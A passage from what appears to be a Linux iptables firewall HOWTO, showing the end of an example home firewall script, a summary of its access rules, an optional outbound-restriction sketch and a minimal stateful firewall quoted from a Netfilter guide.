$IPTABLES -A INPUT -p tcp -s $MAIL_SERVER -d $WAN_IP --dport 113 -j ACCEPT
# Open up Public server ports here (available to the world):
for i in $PUBLIC_PORTS; do
$IPTABLES -A INPUT -p tcp -s $ANYWHERE -d $WAN_IP --dport $i -j ACCEPT
done
# So I can check my home POP3 mailbox from work. Also, so I can ssh
# in to home system. Only allow connections from my workplace's
# various IPs. Everything else is blocked.
$IPTABLES -A INPUT -p tcp -s 255.10.9.8/29 -d $WAN_IP --dport 110 -j ACCEPT
## ICMP (ping)
#
# ICMP rules, allow the bare essential types of ICMP only. Ping
# request is blocked, ie we won't respond to someone else's pings,
# but can still ping out.
$IPTABLES -A INPUT -p icmp --icmp-type echo-reply \
-s $ANYWHERE -d $WAN_IP -j ACCEPT
$IPTABLES -A INPUT -p icmp --icmp-type destination-unreachable \
-s $ANYWHERE -d $WAN_IP -j ACCEPT
$IPTABLES -A INPUT -p icmp --icmp-type time-exceeded \
-s $ANYWHERE -d $WAN_IP -j ACCEPT
# Identd Reject
#
# Special rule to reject (with rst) any identd/auth/port 113
# connections. This will speed up some services that ask for this,
# but don't require it. Be careful, some servers may require this
# one (IRC for instance).
#$IPTABLES -A INPUT -p tcp --dport 113 -j REJECT --reject-with tcp-reset
###################################################################
# Build a custom chain here, and set the default to DROP. All
# other traffic not allowed by the rules above, ultimately will
# wind up here, where it is blocked and logged, unless it passes
# our stateful rules for ESTABLISHED and RELATED connections. Let
# connection tracking do most of the worrying! We add the logging
# ability here with the '-j LOG' target. Outgoing traffic is
# allowed as that is the default policy for the 'output' chain.
# There are no restrictions placed on that in this script.
# New chain...
$IPTABLES -N DEFAULT
# Use the 'state' module to allow only certain connections based
# on their 'state'.
$IPTABLES -A DEFAULT -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPTABLES -A DEFAULT -m state --state NEW -i ! $WAN_IFACE -j ACCEPT
# Enable logging for anything that gets this far.
$IPTABLES -A DEFAULT -j LOG -m limit --limit 30/minute --log-prefix "Dropping: "
# Now drop it, if it has gotten here.
$IPTABLES -A DEFAULT -j DROP
# This is the 'bottom line' so to speak. Everything winds up
# here, where we bounce it to our custom built 'DEFAULT' chain
# that we defined just above. This is for both the FORWARD and
# INPUT chains.
$IPTABLES -A FORWARD -j DEFAULT
$IPTABLES -A INPUT -j DEFAULT
echo "Iptables firewall is up `date`."
##-- eof iptables.sh
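As an aside, the WAN_IP extraction near the top of the script parses ifconfig output, whose format varies between versions. Below is a sketch of the same extraction against iproute2-style "ip addr" output. The interface name and the 192.0.2.x address are made-up sample data (192.0.2.0/24 is a documentation network), hard-coded so the pipeline can be demonstrated without a live interface:

```shell
# Sample 'ip addr show' output, hard-coded for illustration only:
sample='2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500
    inet 192.0.2.10/24 brd 192.0.2.255 scope global eth0'

# Grab the first IPv4 address, dropping the /24 prefix length. The
# /inet / pattern will not match 'inet6' lines.
WAN_IP=$(printf '%s\n' "$sample" | awk '/inet /{split($2, a, "/"); print a[1]; exit}')
echo "WAN_IP is $WAN_IP"
```

On a live system, one would feed `ip addr show $WAN_IFACE` into the same awk pipeline instead of the sample text.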
-----------------------------------------------------------------------------
8.10.3. Summary
A quick rundown of some of the highlights...
We added some host-based access control rules: "blacklisted" and "trusted".
We then showed several types of service- and port-based access rules. For
instance, we allowed some very restrictive access to bigcat's POP3 server so
we could connect only from our workplace. We allowed a very narrow rule for
the ISP's DHCP server: it permits one port on one outside IP address to
connect to only one of our ports, and only via the UDP protocol. This is a
very specific rule! We are being specific since there is no reason to allow
any other traffic to these ports or from these addresses. Remember, our goal
is the minimum amount of traffic necessary for our particular situation.
So we made those few exceptions mentioned above, and all other services
running on bigcat should now be completely blocked from outside connections.
They are still happily running on bigcat, but are now safe and sound behind
our packet filtering firewall. You probably have other services that fall
into this category as well.
We also have a small home network in the above example. We did not take any
steps to block that traffic, so the LAN has access to all services running on
bigcat. It is further "masqueraded", giving it Internet access (a topic
covered in its own HOWTO), via the MASQUERADE rule in the nat table's
POSTROUTING chain. And the LAN is still protected by our firewall, since it
sits behind it. We also didn't impose any restrictive rules on the traffic
leaving bigcat. In some situations, adding such restrictions might be a good
idea.
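If outbound restrictions are wanted, a default-deny OUTPUT policy could be sketched roughly as below. This is a hypothetical add-on, not part of the example script above, and the chosen ports are arbitrary; note too that real-world DNS would also need UDP allowed. IPT is deliberately set to echo the generated rules for review rather than apply them; point it at the real iptables binary to use it:

```shell
# Hypothetical egress policy sketch -- NOT part of the example script above.
# IPT echoes the generated rules so they can be inspected first; change it
# to the real iptables path to actually apply them.
IPT="echo iptables"

egress_rules() {
    $IPT -P OUTPUT DROP                                    # deny outbound by default
    $IPT -A OUTPUT -o lo -j ACCEPT                         # loopback always allowed
    $IPT -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
    # New outbound connections only to a few chosen TCP services
    # (ssh, smtp, dns, http -- adjust to taste):
    for p in 22 25 53 80; do
        $IPT -A OUTPUT -p tcp --dport $p -m state --state NEW -j ACCEPT
    done
}

egress_rules
```

Locking down OUTPUT like this also means every service the firewall host itself needs must be enumerated, which is why the script in this chapter leaves the OUTPUT policy at ACCEPT.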
Of course, this is just a hypothetical example. Your individual situation is
surely different, and would require some changes and likely some additions to
the rules above. For instance, if your ISP does not use DHCP (most do not),
then that rule would make no sense. PPP works differently and such rules are
not needed.
Please don't interpret running any server as we did in this example as
necessarily a "safe" thing to do. We shouldn't do it this way unless a) we
really need to, b) we are running the current, safe version, and c) we are
able to keep abreast of security-related issues that might affect these
services. Vigilance and caution are part of our responsibilities here too.
-----------------------------------------------------------------------------
8.10.4. iptables mini-me
Just to demonstrate how succinctly iptables can be configured in a minimalist
situation, the following is taken from Rusty's Really Quick Guide To Packet
Filtering, by the Netfilter team:
"Most people just have a single PPP connection to the Internet, and don't
want anyone coming back into their network, or the firewall:"
## Insert connection-tracking modules (not needed if built into kernel).
insmod ip_conntrack
insmod ip_conntrack_ftp
## Create chain which blocks new connections, except if coming from inside.
iptables -N block
iptables -A block -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A block -m state --state NEW -i ! ppp0 -j ACCEPT
iptables -A block -j DROP
## Jump to that chain from INPUT and FORWARD chains.
iptables -A INPUT -j block
iptables -A FORWARD -j block
This simple script allows all outbound connections that we initiate, i.e. any
NEW connections (since the default policy of ACCEPT is not changed). Any
connections that are "ESTABLISHED" and "RELATED" to these are then also
allowed. And any NEW connections not arriving on our WAN-side interface,
ppp0, are allowed as well; these would come in on lo, or possibly a LAN
interface like eth1. So we can do whatever we want, but no unwanted incoming
connection attempts from the Internet are allowed. None.
This script also demonstrates the creation of a custom chain, defined here as
"block", which is used both for the INPUT and FORWARD chains.